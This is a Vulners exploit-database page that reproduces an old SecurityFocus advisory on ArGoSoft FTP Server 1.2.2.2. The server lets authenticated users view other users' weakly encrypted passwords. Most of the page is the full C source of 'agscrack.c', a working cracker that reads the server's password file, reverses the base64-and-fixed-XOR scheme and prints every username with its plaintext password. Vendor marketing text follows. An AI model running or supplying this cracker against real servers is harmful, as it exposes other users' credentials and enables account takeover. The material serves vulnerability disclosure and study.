Vulners
Lucene search
ArGoSoft FTP Server 1.2.2 .2 Weak Password Encryption Vulnerability
source: http://www.securityfocus.com/bid/3029/info
ArGoSoft FTP server is an FTP server for the Windows platform.
A design error exists in ArGoSoft FTP which enables an authenticated user to view other users encrypted passwords. However due to a weak encryption scheme it is possible for a user to decrypt the password using a third party utility.
/********************************************************************
* agscrack.c - ArGoSoft FTP Server 1.2.2.2 password file cracker *
* by [ByteRage] <[email protected]> [http://www.byterage.cjb.net] *
********************************************************************/
#include <string.h>
#include <stdio.h>
int len; FILE *fh;
/* DECRYPTION ALGORITHMS */
unsigned char char2bin(unsigned char inbyte) {
if ((inbyte >= 'A') && (inbyte <= 'Z')) { len++; return(inbyte-'A');
}
if ((inbyte >= 'a') && (inbyte <= 'z')) { len++;
return(inbyte-'a'+26); }
if ((inbyte >= '0') && (inbyte <= '9')) { len++; return(inbyte+4); }
if (inbyte == '+') { len++; return('\x3E'); }
if (inbyte == '/') { len++; return('\x3F'); }
return('\x00');
}
void decode(unsigned char chars[], unsigned char bytes[]) {
int i,retval=0;
for(i=0; i<4; i++) { retval <<= 6; retval |= char2bin(chars[i]); }
for(i=0; i<3; i++) { bytes[2-i] = retval & 0xFF; retval >>= 8; }
len--;
}
void decryptpass(unsigned char encrypted[], unsigned char decrypted[])
{
const unsigned char heavycrypt0[] =
"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk
=";
unsigned int j, k=0, l;
len = 0;
for(j=0; j<strlen(encrypted); j+=4) {
decode(&encrypted[j], &decrypted[k]);
for(l=0; l<3; l++) { decrypted[k] ^= heavycrypt0[k++]; }
}
decrypted[len] = '\x00';
}
/* DECRYPTION ALGORITHMS END */
void main(int argc, char ** argv) {
char password[128]; /* ArGoSoft's passwords don't get larger than 128
bytes */
char buf[256]; char b;
int rd;
printf("ArGoSoft FTP Server 1.2.2.2 password file cracker by
[ByteRage]\n\n");
if (argc<2) { printf("Syntax : %s <password(file)>\n", argv[0]);
return 1; }
fh = fopen(argv[1], "rb");
if (!fh) {
decryptpass(argv[1], &password);
printf("%s -> %s\n", argv[1], password);
return 0;
} else {
/* simple password file processor */
fread(&buf,1,1,fh);
if (buf[0] == 4) {
while (1) {
if (fread(&b,1,1,fh) == 0) { break; }
if (fread(&buf,1,b+1,fh) == 0) { break; }
printf("%s : ", buf);
b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; }
if (fread(&buf,1,b+1,fh) == 0) { break; }
decryptpass(&buf, &password);
printf("%s -> %s\n", &buf, password);
b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; }
if (fread(&buf,1,b+1,fh) == 0) { break; }
b=0; while(b!=4) if (fread(&b,1,1,fh) == 0) { break; }
}
} else printf("error when processing passwordfile!");
fclose(fh);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1